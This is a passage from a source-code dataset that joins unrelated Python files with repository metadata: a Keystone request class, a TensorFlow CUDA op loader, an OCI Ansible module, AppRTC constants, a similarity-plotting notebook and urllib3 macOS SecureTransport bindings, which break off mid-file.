] | 4
|
2018-08-22T14:51:02.000Z
|
2018-10-17T14:04:26.000Z
|
keystone/common/request.py
|
Afkupuz/4jaewoo
|
fc69258feac7858f5af99d2feab39c86ceb70203
|
[
"Apache-2.0"
] | 5
|
2018-08-03T17:19:34.000Z
|
2019-01-11T15:54:42.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from pycadf import cadftaxonomy as taxonomy
from pycadf import host
from pycadf import resource
import webob
from webob.descriptors import environ_getter
from keystone.common import authorization
from keystone.common import context
from keystone.common import utils
import keystone.conf
from keystone import exception
from keystone.i18n import _
# Environment variable used to pass the request context
CONTEXT_ENV = 'openstack.context'
CONF = keystone.conf.CONF
LOG = logging.getLogger(__name__)
class Request(webob.Request):
_context_dict = None
def _get_context_dict(self):
# allow middleware up the stack to provide context, params and headers.
context = self.environ.get(CONTEXT_ENV, {})
# NOTE(jamielennox): The webob package throws UnicodeError when a
# param cannot be decoded. If we make webob iterate them now we can
# catch this and throw an error early rather than on access.
try:
self.params.items()
except UnicodeDecodeError:
msg = _('Query string is not UTF-8 encoded')
raise exception.ValidationError(msg)
context['path'] = self.environ['PATH_INFO']
scheme = self.environ.get(CONF.secure_proxy_ssl_header)
if scheme:
# NOTE(andrey-mp): "wsgi.url_scheme" contains the protocol used
# before the proxy removed it ('https' usually). So if
# the webob.Request instance is modified in order to use this
# scheme instead of the one defined by API, the call to
# webob.Request.relative_url() will return a URL with the correct
# scheme.
self.environ['wsgi.url_scheme'] = scheme
context['host_url'] = self.host_url
# authentication and authorization attributes are set as environment
# values by the container and processed by the pipeline. The complete
# set is not yet known.
context['environment'] = self.environ
if self.context:
context['is_admin_project'] = self.context.is_admin_project
context.setdefault('is_admin', False)
return context
@property
def context_dict(self):
if not self._context_dict:
self._context_dict = self._get_context_dict()
return self._context_dict
@property
def auth_context(self):
return self.environ.get(authorization.AUTH_CONTEXT_ENV, {})
def assert_authenticated(self):
"""Ensure that the current request has been authenticated."""
if not self.context:
msg = _('An authenticated call was made and there is '
'no request.context. This means the '
'auth_context middleware is not in place. You '
'must have this middleware in your pipeline '
'to perform authenticated calls')
LOG.warning(msg)
raise exception.Unauthorized(msg)
if not self.context.authenticated:
# auth_context didn't decode anything we can use
raise exception.Unauthorized(
_('auth_context did not decode anything useful'))
@property
def audit_initiator(self):
"""A pyCADF initiator describing the current authenticated context."""
pycadf_host = host.Host(address=self.remote_addr,
agent=self.user_agent)
initiator = resource.Resource(typeURI=taxonomy.ACCOUNT_USER,
host=pycadf_host)
if self.context.user_id:
initiator.id = utils.resource_uuid(self.context.user_id)
initiator.user_id = self.context.user_id
if self.context.project_id:
initiator.project_id = self.context.project_id
if self.context.domain_id:
initiator.domain_id = self.context.domain_id
return initiator
auth_type = environ_getter('AUTH_TYPE', None)
remote_domain = environ_getter('REMOTE_DOMAIN', None)
context = environ_getter(context.REQUEST_CONTEXT_ENV, None)
token_auth = environ_getter('keystone.token_auth', None)
| 37.452381
| 79
| 0.671752
|
4a14474e0829e739db1d640f8b83d3e5e5b5d631
| 2,853
|
py
|
Python
|
phi/tf/tf_cuda_resample.py
|
Neroware/PhiFlow
|
f85d1f46847d27332559e3d2b7ef6ac5d37796eb
|
[
"MIT"
] | null | null | null |
phi/tf/tf_cuda_resample.py
|
Neroware/PhiFlow
|
f85d1f46847d27332559e3d2b7ef6ac5d37796eb
|
[
"MIT"
] | null | null | null |
phi/tf/tf_cuda_resample.py
|
Neroware/PhiFlow
|
f85d1f46847d27332559e3d2b7ef6ac5d37796eb
|
[
"MIT"
] | null | null | null |
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import ops
from phi.struct.tensorop import collapsed_gather_nd
# Load Custom Ops
librariesLoaded = False
try:
current_dir = os.path.dirname(os.path.realpath(__file__))
resample_op_path = os.path.join(current_dir, 'cuda/build/resample.so')
resample_gradient_op_path = os.path.join(current_dir, 'cuda/build/resample_gradient.so')
assert os.path.isfile(
resample_op_path), 'CUDA binaries not found at %s. Run "python setup.py cuda" to compile them' % resample_op_path
assert os.path.isfile(resample_gradient_op_path), 'CUDA binaries not found at %s. Run "python setup.py cuda" to ' \
'compile them' % resample_gradient_op_path
resample_op = tf.load_op_library(resample_op_path)
resample_gradient_op = tf.load_op_library(resample_gradient_op_path)
librariesLoaded = True
except (RuntimeError, AssertionError) as e:
print('Could not load resample cuda libraries:', e)
librariesLoaded = False
# Register gradient
@ops.RegisterGradient("Resample")
def _resample_gradient(op, gradient):
gradients = resample_gradient_op.resample_gradient(gradient, op.inputs[0], op.inputs[1], op.inputs[2])
return [gradients[0], gradients[1], None]
def use_cuda(inputs):
if not librariesLoaded:
return False
if not tf.test.is_gpu_available(True, (3, 0)):
return False
shape = inputs.shape
dims = len(shape) - 2
components = shape[len(shape) - 1]
if dims > 3 or components > 4:
return False
if dims == 1 and shape[1] > 8192:
return False
if dims == 2 and (shape[1] > 32768 or shape[2] > 65536):
return False
if dims == 3 and (shape[1] > 2048 or shape[2] > 2048 or shape[3] > 2048):
return False
return True
def resample_cuda(inputs, sample_coords, boundary):
ZERO = 0
REPLICATE = 1
CIRCULAR = 2
SYMMETRIC = 3
REFLECT = 4
shape = inputs.shape
dims = len(shape) - 2
boundary_array = np.zeros((dims, 2), np.uint32)
for i in range(dims):
for j in range(2):
current_boundary = collapsed_gather_nd(boundary, [i, j]).lower()
if current_boundary == 'zero' or current_boundary == 'constant':
boundary_array[i, j] = ZERO
elif current_boundary == 'replicate':
boundary_array[i, j] = REPLICATE
elif current_boundary == 'circular' or current_boundary == 'wrap':
boundary_array[i, j] = CIRCULAR
elif current_boundary == 'symmetric':
boundary_array[i, j] = SYMMETRIC
elif current_boundary == 'reflect':
boundary_array[i, j] = REFLECT
return resample_op.resample(inputs, sample_coords, boundary_array)
| 37.539474
| 121
| 0.656502
|
4a14477830d7900c2a4dd6acfc6d0fb1cad13cf0
| 4,459
|
py
|
Python
|
plugins/modules/oci_network_cross_connect_location_facts.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_network_cross_connect_location_facts.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
plugins/modules/oci_network_cross_connect_location_facts.py
|
sohwaje/oci-ansible-collection
|
9e6b8cf55e596a96560710a457a7df05886fc59c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_network_cross_connect_location_facts
short_description: Fetches details about one or multiple CrossConnectLocation resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple CrossConnectLocation resources in Oracle Cloud Infrastructure
- Lists the available FastConnect locations for cross-connect installation. You need
this information so you can specify your desired location when you create a cross-connect.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
compartment_id:
description:
- The L(OCID,https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment.
type: str
required: true
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_name_option ]
"""
EXAMPLES = """
- name: List cross_connect_locations
oci_network_cross_connect_location_facts:
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
"""
RETURN = """
cross_connect_locations:
description:
- List of CrossConnectLocation resources
returned: on success
type: complex
contains:
description:
description:
- A description of the location.
returned: on success
type: str
sample: description_example
name:
description:
- The name of the location.
- "Example: `CyrusOne, Chandler, AZ`"
returned: on success
type: str
sample: CyrusOne, Chandler, AZ
sample: [{
"description": "description_example",
"name": "CyrusOne, Chandler, AZ"
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.core import VirtualNetworkClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class CrossConnectLocationFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: list"""
def get_required_params_for_list(self):
return [
"compartment_id",
]
def list_resources(self):
optional_list_method_params = [
"name",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_cross_connect_locations,
compartment_id=self.module.params.get("compartment_id"),
**optional_kwargs
)
CrossConnectLocationFactsHelperCustom = get_custom_class(
"CrossConnectLocationFactsHelperCustom"
)
class ResourceFactsHelper(
CrossConnectLocationFactsHelperCustom, CrossConnectLocationFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(compartment_id=dict(type="str", required=True), name=dict(type="str"),)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="cross_connect_location",
service_client_class=VirtualNetworkClient,
namespace="core",
)
result = []
if resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(cross_connect_locations=result)
if __name__ == "__main__":
main()
| 29.335526
| 121
| 0.696793
|
4a144974f789cf77e53b14078ede814e10141f49
| 2,999
|
py
|
Python
|
src/app_engine/constants.py
|
CoffeyMiao/apprtc
|
db4b915eed03423f7298d2944c1da66c9da401e3
|
[
"BSD-3-Clause"
] | null | null | null |
src/app_engine/constants.py
|
CoffeyMiao/apprtc
|
db4b915eed03423f7298d2944c1da66c9da401e3
|
[
"BSD-3-Clause"
] | null | null | null |
src/app_engine/constants.py
|
CoffeyMiao/apprtc
|
db4b915eed03423f7298d2944c1da66c9da401e3
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2015 Google Inc. All Rights Reserved.
"""AppRTC Constants.
This module contains the constants used in AppRTC Python modules.
"""
import os
# Deprecated domains which we should to redirect to REDIRECT_URL.
REDIRECT_DOMAINS = [
'apprtc.appspot.com', 'apprtc.webrtc.org', 'www.appr.tc'
]
# URL which we should redirect to if matching in REDIRECT_DOMAINS.
REDIRECT_URL = 'https://appr.tc'
ROOM_MEMCACHE_EXPIRATION_SEC = 60 * 60 * 24
MEMCACHE_RETRY_LIMIT = 100
LOOPBACK_CLIENT_ID = 'LOOPBACK_CLIENT_ID'
# Turn/Stun server override. This allows AppRTC to connect to turn servers
# directly rather than retrieving them from an ICE server provider.
ICE_SERVER_OVERRIDE = None
# Enable by uncomment below and comment out above, then specify turn and stun
# ICE_SERVER_OVERRIDE = [
# {
# "urls": [
# "turn:hostname/IpToTurnServer:19305?transport=udp",
# "turn:hostname/IpToTurnServer:19305?transport=tcp"
# ],
# "username": "TurnServerUsername",
# "credential": "TurnServerCredentials"
# },
# {
# "urls": [
# "stun:hostname/IpToStunServer:19302"
# ]
# }
# ]
# ICE_SERVER_BASE_URL = 'https://appr.tc'
# ICE_SERVER_URL_TEMPLATE = '%s/v1alpha/iceconfig?key=%s'
# ICE_SERVER_API_KEY = os.environ.get('ICE_SERVER_API_KEY')
ICE_SERVER_BASE_URL = ''
ICE_SERVER_URL_TEMPLATE = ''
ICE_SERVER_API_KEY = ''
HEADER_MESSAGE = os.environ.get('HEADER_MESSAGE')
ICE_SERVER_URLS = [url for url in os.environ.get('ICE_SERVER_URLS', '').split(',') if url]
# Dictionary keys in the collider instance info constant.
WSS_INSTANCE_HOST_KEY = 'host_port_pair'
WSS_INSTANCE_NAME_KEY = 'vm_name'
WSS_INSTANCE_ZONE_KEY = 'zone'
WSS_INSTANCES = [{
WSS_INSTANCE_HOST_KEY: '10.86.98.32:443',
# WSS_INSTANCE_HOST_KEY: 'apprtc-ws.webrtc.org:443',
WSS_INSTANCE_NAME_KEY: 'wsserver-std',
WSS_INSTANCE_ZONE_KEY: 'us-central1-a'
}, {
WSS_INSTANCE_HOST_KEY: '10.86.98.32:443',
# WSS_INSTANCE_HOST_KEY: 'apprtc-ws-2.webrtc.org:443',
WSS_INSTANCE_NAME_KEY: 'wsserver-std-2',
WSS_INSTANCE_ZONE_KEY: 'us-central1-f'
}]
WSS_HOST_PORT_PAIRS = [ins[WSS_INSTANCE_HOST_KEY] for ins in WSS_INSTANCES]
# memcache key for the active collider host.
WSS_HOST_ACTIVE_HOST_KEY = 'wss_host_active_host'
# Dictionary keys in the collider probing result.
WSS_HOST_IS_UP_KEY = 'is_up'
WSS_HOST_STATUS_CODE_KEY = 'status_code'
WSS_HOST_ERROR_MESSAGE_KEY = 'error_message'
RESPONSE_ERROR = 'ERROR'
RESPONSE_ROOM_FULL = 'FULL'
RESPONSE_UNKNOWN_ROOM = 'UNKNOWN_ROOM'
RESPONSE_UNKNOWN_CLIENT = 'UNKNOWN_CLIENT'
RESPONSE_DUPLICATE_CLIENT = 'DUPLICATE_CLIENT'
RESPONSE_SUCCESS = 'SUCCESS'
RESPONSE_INVALID_REQUEST = 'INVALID_REQUEST'
IS_DEV_SERVER = os.environ.get('APPLICATION_ID', '').startswith('dev')
BIGQUERY_URL = 'https://www.googleapis.com/auth/bigquery'
# Dataset used in production.
BIGQUERY_DATASET_PROD = 'prod'
# Dataset used when running locally.
BIGQUERY_DATASET_LOCAL = 'dev'
# BigQuery table within the dataset.
BIGQUERY_TABLE = 'analytics'
| 31.239583
| 90
| 0.750917
|
4a1449b16aa858fe4b581022fca1a001558a6e45
| 14,389
|
py
|
Python
|
archive/scripts/analysis_0_single_run/nbconverted/4_create_figs.py
|
ajlee21/Batch_effects_simulation
|
d707321346de48de5e63cf251280bdf9372be59c
|
[
"BSD-3-Clause"
] | 6
|
2020-05-04T15:16:32.000Z
|
2021-02-28T04:49:21.000Z
|
archive/scripts/analysis_0_single_run/nbconverted/4_create_figs.py
|
ajlee21/Batch_effects_simulation
|
d707321346de48de5e63cf251280bdf9372be59c
|
[
"BSD-3-Clause"
] | 12
|
2020-02-27T20:12:36.000Z
|
2021-04-07T20:28:35.000Z
|
archive/scripts/analysis_0_single_run/nbconverted/4_create_figs.py
|
ajlee21/Batch_effects_simulation
|
d707321346de48de5e63cf251280bdf9372be59c
|
[
"BSD-3-Clause"
] | 2
|
2019-06-02T18:29:17.000Z
|
2020-02-13T09:33:37.000Z
|
# coding: utf-8
# In[1]:
get_ipython().run_line_magic('load_ext', 'autoreload')
get_ipython().run_line_magic('autoreload', '2')
import os
import sys
import glob
import pickle
import pandas as pd
import numpy as np
from plotnine import (ggplot,
labs,
geom_line,
geom_point,
geom_errorbar,
aes,
ggsave,
theme_bw,
theme,
scale_color_manual,
element_blank,
element_text,
element_rect,
element_line,
coords)
import warnings
warnings.filterwarnings(action='ignore')
from numpy.random import seed
randomState = 123
seed(randomState)
# In[2]:
# File directories
local_dir = "/home/alexandra/Documents/"
similarity_uncorrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_similarity_uncorrected.pickle")
ci_uncorrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_ci_uncorrected.pickle")
similarity_corrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_similarity_corrected.pickle")
ci_corrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_ci_corrected.pickle")
permuted_score_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"saved variables",
"analysis_0_permuted.txt.npy")
# In[3]:
# Output files
svcca_uncorrected_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_uncorrected.png")
svcca_uncorrected_blk_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_uncorrected_blk.png")
svcca_overlay_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_overlay.png")
svcca_overlay_blk_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_overlay_blk.png")
svcca_overlay_long_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_overlay_long.png")
svcca_overlay_long_blk_file = os.path.join(
local_dir,
"Data",
"Batch_effects",
"output",
"talk figures",
"analysis_0_svcca_overlay_long_blk.png")
# In[4]:
# Load pickled files
uncorrected_svcca = pd.read_pickle(similarity_uncorrected_file)
err_uncorrected_svcca = pd.read_pickle(ci_uncorrected_file)
corrected_svcca = pd.read_pickle(similarity_corrected_file)
err_corrected_svcca = pd.read_pickle(ci_corrected_file)
permuted_score = np.load(permuted_score_file)
# In[5]:
# Concatenate error bars
uncorrected_svcca_err = pd.concat([uncorrected_svcca, err_uncorrected_svcca], axis=1)
corrected_svcca_err = pd.concat([corrected_svcca, err_corrected_svcca], axis=1)
# In[6]:
# Add group label
uncorrected_svcca_err['Group'] = 'uncorrected'
corrected_svcca_err['Group'] = 'corrected'
# In[7]:
# Concatenate dataframes
all_svcca = pd.concat([uncorrected_svcca_err, corrected_svcca_err])
all_svcca
# In[8]:
# Plot - uncorrected only
lst_num_experiments = list(all_svcca.index[0:int(len(all_svcca.index)/2)])
threshold = pd.DataFrame(
pd.np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca[all_svcca['Group'] == 'uncorrected']) + geom_line(all_svcca[all_svcca['Group'] == 'uncorrected'],
aes(x=lst_num_experiments, y='score', color='Group'),
size=1.5) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca[all_svcca['Group'] == 'uncorrected'],
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="darkgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_title=element_text(weight='bold'),
plot_background=element_rect(fill="white"),
panel_background=element_rect(fill="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
axis_line=element_line(color="grey"),
legend_key=element_rect(fill='white', colour='white')
) \
+ scale_color_manual(['#b3e5fc']) \
print(g)
ggsave(plot=g, filename=svcca_uncorrected_file, dpi=300)
# In[9]:
# Plot - uncorrected only black
lst_num_experiments = list(all_svcca.index[0:int(len(all_svcca.index)/2)])
threshold = pd.DataFrame(
pd.np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca[all_svcca['Group'] == 'uncorrected']) + geom_line(all_svcca[all_svcca['Group'] == 'uncorrected'],
aes(x=lst_num_experiments, y='score', color='Group'),
size=1.5) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca[all_svcca['Group'] == 'uncorrected'],
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="darkgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_background=element_rect(fill='black'),
legend_title_align = "center",
legend_background=element_rect(fill='black', colour='black'),
legend_key=element_rect(fill='black', colour='black'),
legend_title=element_text(colour="white"),
legend_text=element_text(colour="white"),
plot_title=element_text(weight='bold', colour="white"),
panel_background=element_rect(fill="black"),
axis_line=element_line(color="white"),
axis_text=element_text(color="white"),
axis_title=element_text(color="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
strip_text=element_text(colour="white"),
strip_background=element_blank()
) \
+ scale_color_manual(['#b3e5fc']) \
print(g)
ggsave(plot=g, filename=svcca_uncorrected_blk_file, dpi=300)
# In[10]:
# Plot
lst_num_experiments = list(all_svcca.index)
threshold = pd.DataFrame(
pd.np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca) + geom_line(all_svcca,
aes(x=lst_num_experiments, y='score', color='Group'),
size=1.5) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca,
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="darkgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_title=element_text(weight='bold'),
plot_background=element_rect(fill="white"),
panel_background=element_rect(fill="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
axis_line=element_line(color="grey"),
legend_key=element_rect(fill='white', colour='white')
) \
+ scale_color_manual(['#1976d2', '#b3e5fc']) \
print(g)
ggsave(plot=g, filename=svcca_overlay_file, dpi=300)
# In[11]:
# Plot - black
lst_num_experiments = list(all_svcca.index)
threshold = pd.DataFrame(
pd.np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca) + geom_line(all_svcca,
aes(x=lst_num_experiments, y='score', color='Group'),
size=1.5) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca,
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="lightgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_background=element_rect(fill='black'),
legend_title_align = "center",
legend_background=element_rect(fill='black', colour='black'),
legend_key=element_rect(fill='black', colour='black'),
legend_title=element_text(colour="white"),
legend_text=element_text(colour="white"),
plot_title=element_text(weight='bold', colour="white"),
panel_background=element_rect(fill="black"),
axis_line=element_line(color="white"),
axis_text=element_text(color="white"),
axis_title=element_text(color="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
strip_text=element_text(colour="white"),
strip_background=element_blank()
) \
+ scale_color_manual(['#1976d2', '#b3e5fc']) \
print(g)
ggsave(plot=g, filename=svcca_overlay_blk_file, dpi=300)
# In[12]:
# Plot - elongated
lst_num_experiments = list(all_svcca.index)
threshold = pd.DataFrame(
pd.np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca) + geom_line(all_svcca,
aes(x=lst_num_experiments, y='score', color='Group'),
size=1) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca,
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="darkgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_title=element_text(weight='bold'),
plot_background=element_rect(fill="white"),
panel_background=element_rect(fill="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
axis_line=element_line(color="grey"),
legend_key=element_rect(fill='white', colour='white'),
aspect_ratio=0.4
) \
+ scale_color_manual(['#1976d2', '#b3e5fc']) \
print(g)
ggsave(plot=g, filename=svcca_overlay_long_file, dpi=300)
# In[13]:
# Plot - black
lst_num_experiments = list(all_svcca.index)
threshold = pd.DataFrame(
pd.np.tile(
permuted_score,
(len(lst_num_experiments), 1)),
index=lst_num_experiments,
columns=['score'])
g = ggplot(all_svcca) + geom_line(all_svcca,
aes(x=lst_num_experiments, y='score', color='Group'),
size=1) \
+ geom_point(aes(x=lst_num_experiments, y='score'),
color ='darkgrey',
size=0.5) \
+ geom_errorbar(all_svcca,
aes(x=lst_num_experiments, ymin='ymin', ymax='ymax'),
color='darkgrey') \
+ geom_line(threshold,
aes(x=lst_num_experiments, y='score'),
linetype='dashed',
size=1,
color="lightgrey",
show_legend=False) \
+ labs(x = "Number of Experiments",
y = "Similarity score (SVCCA)",
title = "Similarity across varying numbers of experiments") \
+ theme(plot_background=element_rect(fill='black'),
legend_title_align = "center",
legend_background=element_rect(fill='black', colour='black'),
legend_key=element_rect(fill='black', colour='black'),
legend_title=element_text(colour="white"),
legend_text=element_text(colour="white"),
plot_title=element_text(weight='bold', colour="white"),
panel_background=element_rect(fill="black"),
axis_line=element_line(color="white"),
axis_text=element_text(color="white"),
axis_title=element_text(color="white"),
panel_grid_major_x=element_line(color="lightgrey"),
panel_grid_major_y=element_line(color="lightgrey"),
strip_text=element_text(colour="white"),
aspect_ratio=0.4,
strip_background=element_blank()
) \
+ scale_color_manual(['#1976d2', '#b3e5fc']) \
print(g)
ggsave(plot=g, filename=svcca_overlay_long_blk_file, dpi=300)
| 30.680171
| 122
| 0.610049
|
4a1449e84f297f7d17f7ccd8d3e8c369970b7cac
| 17,651
|
py
|
Python
|
pipenv/vendor/urllib3/contrib/_securetransport/bindings.py
|
offby1/pipenv
|
ce83c629385b4e7a791bd6857c2cf1e26ceb2351
|
[
"MIT"
] | 23
|
2017-01-20T01:18:31.000Z
|
2017-01-20T17:25:11.000Z
|
pipenv/vendor/urllib3/contrib/_securetransport/bindings.py
|
offby1/pipenv
|
ce83c629385b4e7a791bd6857c2cf1e26ceb2351
|
[
"MIT"
] | 1
|
2022-03-17T13:12:17.000Z
|
2022-03-17T13:12:17.000Z
|
pipenv/vendor/urllib3/contrib/_securetransport/bindings.py
|
offby1/pipenv
|
ce83c629385b4e7a791bd6857c2cf1e26ceb2351
|
[
"MIT"
] | null | null | null |
"""
This module uses ctypes to bind a whole bunch of functions and constants from
SecureTransport. The goal here is to provide the low-level API to
SecureTransport. These are essentially the C-level functions and constants, and
they're pretty gross to work with.
This code is a bastardised version of the code found in Will Bond's oscrypto
library. An enormous debt is owed to him for blazing this trail for us. For
that reason, this code should be considered to be covered both by urllib3's
license and by oscrypto's:
Copyright (c) 2015-2016 Will Bond <will@wbond.net>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import
import platform
from ctypes import (
CDLL,
CFUNCTYPE,
POINTER,
c_bool,
c_byte,
c_char_p,
c_int32,
c_long,
c_size_t,
c_uint32,
c_ulong,
c_void_p,
)
from ctypes.util import find_library
from pipenv.vendor.urllib3.packages.six import raise_from
if platform.system() != "Darwin":
raise ImportError("Only macOS is supported")
version = platform.mac_ver()[0]
version_info = tuple(map(int, version.split(".")))
if version_info < (10, 8):
raise OSError(
"Only OS X 10.8 and newer are supported, not %s.%s"
% (version_info[0], version_info[1])
)
def load_cdll(name, macos10_16_path):
"""Loads a CDLL by name, falling back to known path on 10.16+"""
try:
# Big Sur is technically 11 but we use 10.16 due to the Big Sur
# beta being labeled as 10.16.
if version_info >= (10, 16):
path = macos10_16_path
else:
path = find_library(name)
if not path:
raise OSError # Caught and reraised as 'ImportError'
return CDLL(path, use_errno=True)
except OSError:
raise_from(ImportError("The library %s failed to load" % name), None)
Security = load_cdll(
"Security", "/System/Library/Frameworks/Security.framework/Security"
)
CoreFoundation = load_cdll(
"CoreFoundation",
"/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation",
)
Boolean = c_bool
CFIndex = c_long
CFStringEncoding = c_uint32
CFData = c_void_p
CFString = c_void_p
CFArray = c_void_p
CFMutableArray = c_void_p
CFDictionary = c_void_p
CFError = c_void_p
CFType = c_void_p
CFTypeID = c_ulong
CFTypeRef = POINTER(CFType)
